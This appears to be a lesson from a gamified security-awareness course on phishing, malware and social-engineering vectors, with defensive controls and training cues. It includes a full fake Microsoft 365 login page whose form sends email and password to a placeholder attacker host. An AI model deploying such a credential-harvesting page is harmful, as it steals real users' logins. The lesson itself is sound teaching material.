We have profiled who attacks and why they do it. Now we examine how they gain initial access β the attack vectors that convert an external threat into an internal incident. Despite billions spent on perimeter defenses, the most reliable attack vectors target the one component that cannot be patched: human psychology. Phishing remains the initial access vector in over 90% of data breaches according to Verizon's DBIR. Understanding these vectors is not just about technical defense; it is about designing systems that are resilient to human error.
Phishing is the fraudulent attempt to obtain sensitive information or deploy malware by impersonating a trustworthy entity. It has evolved far beyond poorly-spelled Nigerian prince emails. Spear-phishing targets specific individuals with personalized context harvested from social media and corporate websites. Whaling targets C-suite executives. Business Email Compromise (BEC) impersonates vendors or executives to trick finance departments into wiring funds. SMS-based smishing and voice-based vishing extend the attack surface beyond email.
<!-- Simple credential-harvesting phishing page (for educational red-team simulation) -->
<!DOCTYPE html>
<html>
<head><title>Microsoft 365 Login</title></head>
<body style="font-family: 'Segoe UI', sans-serif; background: #f3f2f1;">
<div style="max-width: 440px; margin: 100px auto; padding: 44px; background: white; box-shadow: 0 2px 6px rgba(0,0,0,0.1);">
<img src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" width="108" alt="Microsoft Logo">
<h2 style="font-weight: 600;">Sign in</h2>
<!-- The form POSTs to attacker-controlled server, not Microsoft -->
<form method="POST" action="https://attacker-c2.example.com/collect">
<input type="email" name="email" placeholder="Email, phone, or Skype" style="width:100%; padding:8px; margin:8px 0;" required>
<input type="password" name="password" placeholder="Password" style="width:100%; padding:8px; margin:8px 0;" required>
<button type="submit" style="width:100%; padding:10px; background:#0067b8; color:white; border:none;">Sign in</button>
</form>
</div>
</body>
</html>
<!-- This page is visually identical to legitimate Microsoft login β the only tell is the form action URL -->The HTML above demonstrates how trivially an attacker can clone a legitimate login page. The visual rendering is pixel-perfect; the only indicator of fraud is the `action` attribute pointing to `attacker-c2.example.com`. This is why security awareness training must teach users to inspect the URL bar, not just the page appearance. Technical controls like browser-based phishing detection and email security gateways add layers of defense, but they are not foolproof.
Malware (malicious software) encompasses viruses, worms, trojans, ransomware, spyware, adware, and rootkits. While delivery mechanisms vary β email attachments, malicious websites, infected USB drives β the infection chain follows a predictable pattern: delivery, execution, persistence, command-and-control (C2) communication, and objective completion. Modern malware often uses 'living-off-the-land' techniques, leveraging legitimate system tools like PowerShell and WMI to avoid detection by signature-based antivirus.
Social engineering exploits human psychology rather than technical vulnerabilities. Pretexting creates a fabricated scenario to obtain information (posing as IT support to request a password reset). Baiting uses curiosity or greed (dropping infected USB drives in a parking lot labeled 'Salary Data 2026'). Tailgating bypasses physical security by following an authorized person through a secured door. The 2020 Twitter hack, which compromised high-profile accounts including Barack Obama and Elon Musk, succeeded entirely through social engineering β attackers called Twitter employees posing as IT staff and convinced them to provide credentials.
π‘ Social engineering exploits cognitive biases: authority bias (obeying someone who sounds authoritative), urgency bias (acting fast when told 'this is an emergency'), and scarcity bias (pursuing limited-time offers). Technical controls cannot fully mitigate these β security culture and verification procedures are the primary defense.
| Attack Vector | Category | Primary Exploited Weakness | Top Defensive Control | User Training Cue |
|---|---|---|---|---|
| Spear-phishing email | Phishing | Trust in known contacts + urgency bias | Email security gateway + DMARC/DKIM/SPF | Check sender's actual email address, not display name |
| Credential harvesting page | Phishing | Visual trust in familiar login screens | Password manager (won't autofill on fake domain) | Check URL bar for correct domain before typing password |
| Malicious Office macro | Malware | Users enable macros when document claims to be 'protected' | Disable macros by default via GPO; block macros from internet | Never enable macros on documents from external sources |
| PowerShell download cradle | Malware (LOTL) | PowerShell execution policies too permissive | Constrained Language Mode + script block logging | Report unexpected PowerShell windows immediately |
| Pretexting phone call | Social Engineering | Authority bias + lack of verification procedures | Callback verification using known phone numbers | Always verify identity through a separate channel |
| USB baiting | Social Engineering | Curiosity + trust in physical media | Disable AutoRun; USB device control policies | Never plug in found USB drives β report to security |
β οΈ The most effective phishing email is the one your security team never sees because the user deleted it without reporting it. Implement a 'report phishing' button that is easier to use than deleting the email. Gamify reporting β reward users who catch simulated phishing tests, don't punish those who fail.
Verify exercises to earn β 130 XP and unlock next lab level.